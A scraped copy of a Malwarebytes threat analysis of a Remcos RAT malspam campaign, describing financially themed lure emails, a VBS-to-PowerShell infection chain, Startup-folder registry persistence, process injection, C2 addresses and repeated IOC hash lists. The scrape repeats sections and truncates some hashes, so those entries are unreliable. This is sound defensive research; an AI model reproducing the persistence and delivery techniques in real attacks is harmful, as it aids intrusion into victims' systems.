scripts are not identical, the intermediary\r\nsteps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt, and in newer samples,\r\nBypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus\r\nevasion functionality not seen in the Remcos samples. Further research is required to determine whether this set of scripts is\r\na generically available package, or specific to a particular actor and being re-used across campaigns.\r\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware\r\nsuggests that it could be targeted in nature. Remcos is a mature trojan that has evolved over many years; though the basic\r\ncapabilities have remained the same, the methodologies of distribution and installation continue to change. Because it is\r\nsoftware that can be purchased openly online, it is difficult to trace or attribute usage to a particular actor. However, given\r\nthe consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind\r\nthese attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 15 of 42\n\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 16 of 42\n\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 17 of 42\n\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 18 of 42\n\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nThis blog post was authored by Erika Noerenberg\r\nIntroduction\r\nOver the past months, Malwarebytes researchers have been tracking a unique malspam campaign delivering the Remcos\r\nremote access trojan (RAT) via financially-themed emails. Remcos is often delivered via malicious documents or archive\r\nfiles containing scripts or executables. Like other RATs, Remcos gives the threat actor full control over the infected system\r\nand allows them to capture keystrokes, screenshots, credentials, or other sensitive system information. Unlike most RATs\r\nused by malicious actors however, Remcos is marketed as an administrative tool by the company Breaking Security which\r\nsells it openly on their website.\r\nDistribution\r\nRemcos often infects a system by embedding a specially-crafted settings file into an Office document, allowing an attacker\r\nto trick a user to run malicious code without additional notification. This variant of Remcos has been observed to be\r\ndistributed via targeted spam emails with an attached archive file. The emails and attachment names have been primarily\r\nfinancially-themed; an example email is shown below:\r\nFor illustration, the following table lists a sample of email subjects and attachment names from 2021 by date:\r\nDate Subject Attachment Name Contents\r\n21\r\nJan\r\nSeparate\r\nRemittance\r\nAdvice: paper\r\ndocument no –\r\n9604163\r\nPayment Advice.img Payment Advice.vbs\r\n26\r\nApr\r\nAppraisal Report\r\nfor your Loan\r\nApplication-11003354677341\r\nAppraisal.reportl1100335467734.zip\r\nAppraisal.vbs\r\nProperty.hta*\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 19 of 42\n\nDate Subject Attachment Name Contents\r\n18\r\nMay\r\nFwd: Appraisal\r\nReport for your\r\nLoan\r\nApplication-1100788392210\r\nAppraisalreportl1100788392210.zip Appraisal..vbs\r\n28\r\nJun\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11002214991\r\ntransaction_completed11003456773311..zip Report-Slip.vbs\r\n6 Jul\r\nFwd: Reminder:\r\nYour July\r\nAppointment-11003456773312\r\ntransaction_completed11003456773312.zip\r\nReport-11003456773312.vbs\r\nIn most Remcos spam campaigns, the payload is an executable contained in an attached archive (.zip) or disk image (.img)\r\nfile, though malicious documents are also sometimes used. In this campaign however, the emails contain a zip archive\r\ncontaining a Visual Basic script (.vbs) which downloads and executes additional scripts and finally installs the Remcos\r\npayload.\r\n*Eariler versions also included a “Property.hta” file which only comprised the VB script wrapped in HTML as seen below.\r\nInterestingly, the body of this HTML consisted only of the text “demo”, which indicates this might have been test code.\r\nAnalysis\r\nRemcos is a fully-functioning RAT that gives the threat actor full control over the infected system and allows them to collect\r\nkeystrokes, audio, video, screenshots, and system information. Because it has full control, Remcos is also able to download\r\nand execute additional software onto the system. This Remcos distribution utilizes a series of scripts that ultimately results\r\nin the injection of a Remcos payload into the Windows system binary aspnet_compiler.exe. A sample infection chain for\r\nthis variant is shown below:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 20 of 42\n\nThe samples analyzed below originate from the attachment Appraisalreportl1100788392210.zip (SHA256\r\n4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a13bb23e). As with all analyzed samples, the the\r\ninfection chain followed the process flow above; the initial Visual Basic script initiates a series of download and execution\r\nof obfuscated scripts that eventually result in the injection of the final Remcos payload into aspnet_compiler.exe.\r\nAlthough the script above is lengthy due to obfuscation, it ultimately amounts to the following simple powershell command\r\nwhich downloads and executes a second Visual Basic script:\r\nThe first downloaded script (ALL.TXT) also uses simple deobfuscation techniques to perform a few simple tasks. The\r\n$JUANADEARCO variable in this script contains Base64-encoded data which is decoded by the last line of the script (this\r\ndata is shown as decoded in the highlighted box in the image below). This script performs the following actions:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 21 of 42\n\nCreates the directory C:UsersPublicRun\r\nDownloads Run_02_02_02.TXT (saved as C:UsersPublicRunRun.vbs)\r\nDownloads Lerveri.txt (saved as UsersPublicRun—–Run+++++++++.ps1)\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerUser Shell FoldersStartup to “C:UsersPublicRun”\r\nSets HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerShell FoldersStartup to “C:UsersPublicRun”\r\nThe shell folder registry entries are legacy keys that are still existent for backwards compatibility. Setting the “Startup”\r\nvalue of these registry entries to the malware’s directory of execution effectively sets the contents of that directory to\r\nexecute upon system startup, ensuring persistence.\r\nRun.vbs is obfuscated in a similar fashion to the initial Visual Basic script:\r\nThis script (deobfuscated below) is responsible only for execution the main powershell script which contains embedded\r\nbinaries, encoded in hex in plaintext.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 22 of 42\n\nOne of the binaries encoded in —–Run+++++++++.ps1 is the Remcos payload which is loaded into the legitimate\r\nWindows binary aspnet_compiler.exe. The following function in the powershell script loads the Remcos PE into the binary:\r\nAlthough all of the analyzed Remcos samples of this campaign since January 2021 call back to the same IP address and port,\r\nno actual C2 traffic has been observed. All of the script downloads have pointed to addresses on the legitimate website\r\nus.archive.org, and the payloads have connected (though only via TCP handshake) to the IP address 185.19.85[.]168 on port\r\n8888.\r\nBecause this IP address has not changed over several months, we investigated the passive DNS records to see if the\r\ninfrastructure may have been used in other recent attacks. We found that this IP address had the following resolutions over\r\nthe last few months:\r\nAddress First Seen Last Seen\r\nshugardaddy.ddns.net 26 May 21\r\nch-pool-1194.nvpn.to 24 May 21 30 June 21\r\ntippet.duckdns.org 13 May 21 16 May 21\r\nmail.swissauto.top 29 May 20 11 May 21\r\nrandyphoenix.hopto.org 4 April 21 14 April 21\r\nExamination of this IP address revealed several hosted services on multiple ports. The highlighted date range above is\r\ninteresting as it appears to be a mail server, and Spamhaus Zen classifies this address as blocked due to spam. Furthermore,\r\nanalysis also revealed that the #totalhash malware database contains malware associated with this address going back as far\r\nas 2013. Correlating additional malware associated with this address showed several other versions of Remcos samples\r\nconnecting to the same IP (many to shugardaddy.ddns.net port 5946) – a few recent samples are shown below:\r\nSHA256 Hash\r\nDate Last\r\nSeen\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1 6 Jul 21\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e 5 Jul 21\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a 29 Jun 21\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4 25 Jun 21\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2 25 Jun 21\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36 21 Jun 21\r\nOne identifying factor from this campaign is the use of us.archive.org to host payloads. Although this is not unique to\r\nmalware campaigns in general, it is unique to the Remcos campaigns we have analyzed – only the VBS method of\r\ndistribution has been observed to display this behavior.\r\nIn an analysis from Morphisec in March of this year, an HCrypt loader sample was analyzed that demonstrated a similar\r\ninfection chain to the Remcos samples discussed above. Although the stages and scripts are not identical, the intermediary\r\nsteps share a few similarities, such as the file names of the downloaded scripts ALL.txt, Server.txt, and in newer samples,\r\nBypass.txt. The scripts also have a few function names in common, but the HCrypt samples have anti-analysis and anti-virus\r\nevasion functionality not seen in the Remcos samples. Further research is required to determine whether this set of scripts is\r\na generically available package, or specific to a particular actor and being re-used across campaigns.\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 23 of 42\n\nAlthough the actor or group behind this campaign is not known, the sporadic nature of the emails distributing this malware\r\nsuggests that it could be targeted in nature. Remcos is a mature trojan that has evolved over many years; though the basic\r\ncapabilities have remained the same, the methodologies of distribution and installation continue to change. Because it is\r\nsoftware that can be purchased openly online, it is difficult to trace or attribute usage to a particular actor. However, given\r\nthe consistency of network infrastructure and installation methodology, it is possible that the motivation or actors behind\r\nthese attacks could be identified. Malwarebytes analysts continue to monitor and track this threat and will update detections\r\nand indicators as needed.\r\nProtection\r\nMalwarebytes protects users from Remcos by using real-time protection.\r\nReferences\r\nhttps://www.anomali.com/blog/threat-actors-use-msbuild-to-deliver-rats-filelessly\r\nhttps://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers\r\nhttps://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service\r\nIOCs\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 24 of 42\n\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nRemcos VB Scripts:\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 25 of 42\n\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 \r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27 \r\n7519540343e10c7846979809166df1cd0f01087ea53bf20fd5dd416dc6ebad14 \r\ndae93e987a854255ff55ce9f62729f17f57d3f8a56933a57cb8de89b698e81f0 \r\nb61f6b794f38f736e90ae8aa04e5f71acc8d5470c08ef8841c16087b6710a388 \r\n6f4f4f4b980e471c5f8f5d0d95bff5a7ec98e3e2377f18f7fc0d44828cbe33a6 \r\nRelated Remcos Samples:\r\n15cf9daf5bad1a5a78783f675eb63850e216a690e0f3302738ce3bd825ba6fc1\r\n0ea2e136c0604fe2336a37c9d7b5a6150abd58e48311fa625ea375468189931e\r\n8d0dfc2239405eebc7a9d5483492a0225963fae4c110ecbd12f1f39ce1ef937a\r\n22634cbaf1a60ca499a9b692aae881cffdaf205a4755ee34915e5512ea87cab4\r\n898020967dbec06a60b63269d54b15ad968e2f1146f10fdbf22e79e2339425d2\r\nd7aede3e0703ce5ec7bb4c333d4ddb6551fb5032825e756b7132367625107a36\r\na80c2e71f7cc69a729035941d13c79fd210290e7f82cefce14ceef7dba3f3026\r\n1aa8163fc4947fec127350aebc420e4832a5e7a3430109201f6796fc12292dfc\r\n4a7d54b6013b6296df3576a8d62f00cbc4af18fbbbfa97b831c38c664b4d70ce\r\nc55dffdcb320a06872faa4cc7777bafd81051a17533e919fbee3fc27e8f47135\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n59aafb3dd9c6cdb95ff662299e1faf3efb01d5ef8479dbbb8032b4b9cb3c3d91\r\nadf94da54bc49abc6fdb2a36523eb726f26dacd5598a0fdc64e61b8d500edad8\r\n1d969ace725bf5185e64c3c4a6ab122a3ff4eaafe25f56bd8c1d7b7ba2df0aac\r\na54f4ee320b21c1cfde3358a25131476127b9fb1fd5cad9fd03fa2be1f4fd0e2\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084\r\n46b1d3c565a615b2df02a567f507a2dc7f75d088fc2b52b1f1e1ce7a92594175\r\n1a7ceaddf547d47cf7d2d7eda0357d38f489eaeb3b06ea3027ae87df6e5c8195\r\n47287127bcc7bf1502d8b84af3c9050a6b46caa9e1558ab27a2c1b0883505b15\r\n509fb00b3a458a86563737c0ce278f6fb713eafe90da7e14aa0d54566e172a81\r\ne06220108f931bb43ecf136844cdfede4b9a1bbc637b6ff8a3870710e709fe0e\r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10\r\n0fe5a7d7d6a2c077b4b641f4d2077f2fa476a2317283323801bed7a7a6770906\r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200\r\n0d74a33006727ab086e281681cc8ee3d71ee7843f19b6fa52a86efc92b0444a1\r\n5f06da67169389577ec237bfb0c3e0e9203833048f48081deed7b6201ad18c27\r\n5ca6ae0cf402083bb06f267962b62d812151c8193a6b726ef1b84a2ed7ca5ef2\r\nOther IOCs:\r\n185.19.85.168\r\nia601401.us.archive.org\r\nia601502.us.archive.org\r\nia601405.us.archive.org\r\nia601406.us.archive.org\r\nshugardaddy.ddns.net\r\nch-pool-1194.nvpn.to\r\ntippet.duckdns.org\r\nhttps://blog.malwarebytes.com/threat-analysis/2021/07/remcos-rat-delivered-via-visual-basic/\r\nPage 26 of 42\n\nmail.swissauto.top\r\nrandyphoenix.hopto.org\r\nAnalyzed Samples:\r\nType Name / Subject SHA256\r\nEmail\r\nSubject\r\nFwd: Appraisal Report for your\r\nLoan Application-1100788392210\r\n673b315a95b8c816502ec0dc3cae79cf14e0d7c09139c2fc4b9202fb0\r\nAttachment Appraisalreportl1100788392210.zip 4e712de8a3d602ccf55321a85701114c01f9731af356da05fb6e3881a\r\nExtracted\r\nSample\r\nAppraisal..vbs 1f8853601030ad92bd78fd3f0fbf39eacd2f39f47317914b67aa26dfd5\r\nRemcos VB Scripts:\r\n92a7e167629bd14c88a03ef1b6719acd143082c495972a829f20cc588fd6e084 \r\nb1849476d3b8900288d6bf7c9ac229eba5e64d665398302a0842c335259f6560 \r\nba4b51ae64c68b32d126322b51b41dce7c300c01faed97aca35ff142e121a914 \r\n5a69f279426b012b64a3099d778cd57aeca9db135d9701c2e11f71d55c3fb5e3 \r\ndb01d69a7ae17947f77b50cfb03b2be6b784eeecdabfbb966b61ecdb3490d3ad \r\n109a40435ad446c7b03af30bb049f55275a659c0271fa7a8a1a59d5871d18c10 \r\na5ae2e0f9a8f1c50e21ea93f4a195097753cd16436ffa4e946add38da873c8cb \r\na465bb35f4e7bafb2fea17156c39daee286e49c3f10463ecb8d29766e2d0b200 \r\nd2d9b66c9aad0e6cc20a786a89299a8b4a65a5a344db369dfd7bfbad3fb40b55 